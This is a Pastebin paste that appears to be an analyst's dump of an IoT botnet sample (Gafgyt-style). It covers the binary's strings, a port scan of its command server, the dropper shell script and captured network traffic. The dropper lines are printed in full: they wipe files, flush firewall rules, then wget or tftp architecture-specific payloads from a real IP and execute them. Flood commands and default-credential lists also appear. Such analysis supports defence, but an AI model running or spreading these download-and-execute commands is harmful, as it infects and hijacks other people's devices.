Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- File Type:
- ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
- -----------------------------------------------
- rodata:
- @ #!
- !1C "
- PIGGY
- 8.8.8.8
- /proc/net/route
- 00000000
- /bin/sh
- Invalid flag "%s"
- Failed opening raw socket.
- Failed setting raw headers mode.
- %d.%d.%d.%d
- %d.%d.%d.0
- echo -en '\x67\x61\x79\x66\x67\x74'
- REPORT %s:%s:%s
- cd /tmp; busybox wget http://176.123.6.195/bin2.sh; sh bin2.sh;busybox tftp -r bin.sh -g 176.123.6.195; sh bin.sh; echo -e '\x62\x69\x6e\x66\x61\x67\x74'
- PING
- PONG!
- GETLOCALIP
- My IP: %s
- SCANNER
- SCANNER ON | OFF
- TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
- KILLATTK
- LOLNOGTFO
- self
- /proc/
- /cmdline
- /proc
- BUILD %s
- PING
- PONG
- %s 2>&1
- 176.123.6.195:8080
- 176.123.6.195:3000
- root
- admin
- guest
- invalid
- incorrect
- fail
- again
- wrong
- accessdenied
- error
- success
- busybox
- shell
- dvrdvs
- user
- login
- pass
- name
- gayfgt
- binfagt
- (nil)
- (null)
- hlLjztqZ
- npxXoudifFeEgGaACScs
- +0-#'I
- Unknown error
- Success
- Operation not permitted
- No such file or directory
- No such process
- Interrupted system call
- Input/output error
- No such device or address
- Argument list too long
- Exec format error
- Bad file descriptor
- No child processes
- Resource temporarily unavailable
- Cannot allocate memory
- Permission denied
- Bad address
- Block device required
- Device or resource busy
- File exists
- Invalid cross-device link
- No such device
- Not a directory
- Is a directory
- Invalid argument
- Too many open files in system
- Too many open files
- Inappropriate ioctl for device
- Text file busy
- File too large
- No space left on device
- Illegal seek
- Read-only file system
- Too many links
- Broken pipe
- Numerical argument out of domain
- Numerical result out of range
- Resource deadlock avoided
- File name too long
- No locks available
- Function not implemented
- Directory not empty
- Too many levels of symbolic links
- No message of desired type
- Identifier removed
- Channel number out of range
- Level 2 not synchronized
- Level 3 halted
- Level 3 reset
- Link number out of range
- Protocol driver not attached
- No CSI structure available
- Level 2 halted
- Invalid exchange
- Invalid request descriptor
- Exchange full
- No anode
- Invalid request code
- Invalid slot
- Bad font file format
- Device not a stream
- No data available
- Timer expired
- Out of streams resources
- Machine is not on the network
- Package not installed
- Object is remote
- Link has been severed
- Advertise error
- Srmount error
- Communication error on send
- Protocol error
- Multihop attempted
- RFS specific error
- Bad message
- Value too large for defined data type
- Name not unique on network
- File descriptor in bad state
- Remote address changed
- Can not access a needed shared library
- Accessing a corrupted shared library
- .lib section in a.out corrupted
- Attempting to link in too many shared libraries
- Cannot exec a shared library directly
- Invalid or incomplete multibyte or wide character
- Interrupted system call should be restarted
- Streams pipe error
- Too many users
- Socket operation on non-socket
- Destination address required
- Message too long
- Protocol wrong type for socket
- Protocol not available
- Protocol not supported
- Socket type not supported
- Operation not supported
- Protocol family not supported
- Address family not supported by protocol
- Address already in use
- Cannot assign requested address
- Network is down
- Network is unreachable
- Network dropped connection on reset
- Software caused connection abort
- Connection reset by peer
- No buffer space available
- Transport endpoint is already connected
- Transport endpoint is not connected
- Cannot send after transport endpoint shutdown
- Too many references: cannot splice
- Connection timed out
- Connection refused
- Host is down
- No route to host
- Operation already in progress
- Operation now in progress
- Stale NFS file handle
- Structure needs cleaning
- Not a XENIX named type file
- No XENIX semaphores available
- Is a named type file
- Remote I/O error
- Disk quota exceeded
- No medium found
- Wrong medium type
- /dev/null
- CAk[S
- --------------------------------------------------------
- Ports:
- root@dongzzz:~# nmap --open 176.123.6.195
- Starting Nmap 6.00 ( http://nmap.org ) at 2015-11-16 03:20 EST
- Nmap scan report for ^.>.<.^
- Host is up (0.00056s latency).
- Not shown: 996 closed ports
- PORT STATE SERVICE
- 22/tcp open ssh
- 80/tcp open http
- 3000/tcp open ppp
- 8080/tcp open http-proxy
- Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
- 176.123.6.195:8080
- 176.123.6.195:3000
- --------------------------------------------------------
- Malware:
- #!/bin/sh
- rm -f *
- iptables -F
- iptables -X
- busybox wget http://176.123.6.195/mipsel; cp /bin/busybox ./; cat mipsel > busybox; rm mipsel; cp busybox fjkasdia; rm busybox; chmod 777 fjkasdia; ./fjkasdia; rm fjkasdia
- busybox wget http://176.123.6.195/mips; cp /bin/busybox ./; cat mips > busybox; rm mips; cp busybox fjkasdia; rm busybox; chmod 777 fjkasdia; ./fjkasdia; rm fjkasdia
- busybox wget http://176.123.6.195/arm; cp /bin/busybox ./; cat arm > busybox; rm arm; cp busybox fjkasdia; rm busybox; chmod 777 fjkasdia; ./fjkasdia; rm fjkasdia
- rm -f *
- cd /tmp; busybox wget http://176.123.6.195/bin2.sh; sh bin2.sh;busybox tftp -r b in.sh -g 176.123.6.195; sh bin.sh; echo -e '\x62\x69\x6e\x66\x61\x67\x74'
- ---------------------------------------------
- TCP Raw Streams
- 172.16.1.31:53085 --> 176.123.6.195:8080
- [172.16.1.31:53085 --> 176.123.6.195:8080]
- BUILD PIGGY
- PING
- [176.123.6.195:8080 --> 172.16.1.31:53085]
- !* SCANNER ON
- ---------------------------------------------
- Established IP Connections:
- Protocol IP Address : Port
- ICMP 104.162.164.107
- ICMP 104.162.164.149
- ICMP 104.162.164.122
- TCP 104.162.164.128 : 23
- TCP 104.162.164.247 : 23
- TCP 104.162.164.177 : 23
- TCP 104.162.164.151 : 23
- TCP 104.162.164.59 : 23
- TCP 104.162.164.21 : 23
- TCP 204.3.195.26 : 23
- TCP 204.3.195.45 : 23
- TCP 104.162.164.92 : 23
- TCP 204.3.195.24 : 23
- TCP 204.3.195.29 : 23
- TCP 204.3.195.70 : 23
- TCP 104.162.164.148 : 23
- TCP 104.162.164.147 : 23
- TCP 104.162.164.113 : 23
- TCP 104.162.164.155 : 23
- TCP 204.3.195.71 : 23
- TCP 104.162.164.156 : 23
- TCP 104.162.164.86 : 23
- TCP 104.162.164.242 : 23
- TCP 204.3.195.75 : 23
- TCP 104.162.164.64 : 23
- TCP 104.162.164.138 : 23
- TCP 204.3.195.33 : 23
- TCP 204.3.195.65 : 23
- TCP 104.162.164.217 : 23
- TCP 104.162.164.140 : 23
- TCP 104.162.164.159 : 23
- TCP 104.162.164.51 : 23
- TCP 204.3.195.50 : 23
- TCP 104.162.164.22 : 23
- TCP 204.3.195.25 : 23
- TCP 104.162.164.188 : 23
- TCP 204.3.195.73 : 23
- TCP 104.162.164.201 : 23
- TCP 104.162.164.114 : 23
- TCP 104.162.164.252 : 23
- TCP 204.3.195.16 : 23
- TCP 204.3.195.72 : 23
- TCP 104.162.164.96 : 23
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement